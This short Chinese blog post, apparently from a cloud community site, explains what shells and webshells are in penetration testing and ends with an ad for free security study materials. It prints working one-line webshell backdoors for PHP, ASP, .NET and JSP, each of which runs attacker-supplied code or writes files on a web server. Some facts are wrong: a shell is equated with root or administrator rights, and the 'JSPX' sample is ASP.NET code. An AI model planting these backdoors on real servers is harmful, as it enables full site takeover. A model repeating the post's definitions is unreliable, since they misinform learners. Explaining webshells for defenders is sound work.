渗透测试中说的Shell和Webshll到底说的是什么?
【摘要】 渗透测试中说的Shell和Webshll到底说的是什么?
“牛逼的Shell和WebShell”
💻Shell
Shell其实是主机的管理员权限,外行人听着好牛逼。For Example:
- Windows中就是PowerShell
- Linux中就是root权限
📺webshell
WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。
📹webshell分类
webshell根据脚本类型可以分为
- PHP脚本木马
<?php @eval($_POST[value]);?>
- ASP脚本木马
<%execute(request(“value”))%>
- .NET脚本木马
<%@ Page Language="Jscript"%><%eval(Request.Item["z"],"value");%>
- JSP脚本木马
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>
- JSPX脚本木马
<%@ Page Language=“Jscript”%>
<%eval(Request.Item[“value”])%>
根据时代和技术的变迁,国外也有用python编写的脚本木马,不过国内常用的无外乎三种,大马,小马,一句话木马。
🚟网络安全2021必备资料&渗透测试&面试
不管你是小白还是工作已久不管你在面试还是已跳槽,都应该好好看看这份资料真的超级超级全面几乎打败了市面上90%的自学资料并覆盖了整个网络安全 来 肝了它!肯定会对你有帮助!
2021最新整理网络安全\渗透测试/运维安全学习资料(全套视频、大厂面经、精品手册。必备工具包)
网络安全面试题
SRC技术文档(共186页)干货满满!!
工具包(最多,不用费劲搜索)
👀 👀 👀关注公众号免费领⑧👇 👇 👇
【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱:
cloudbbs@huaweicloud.com
- 点赞
- 收藏
- 关注作者
评论(0)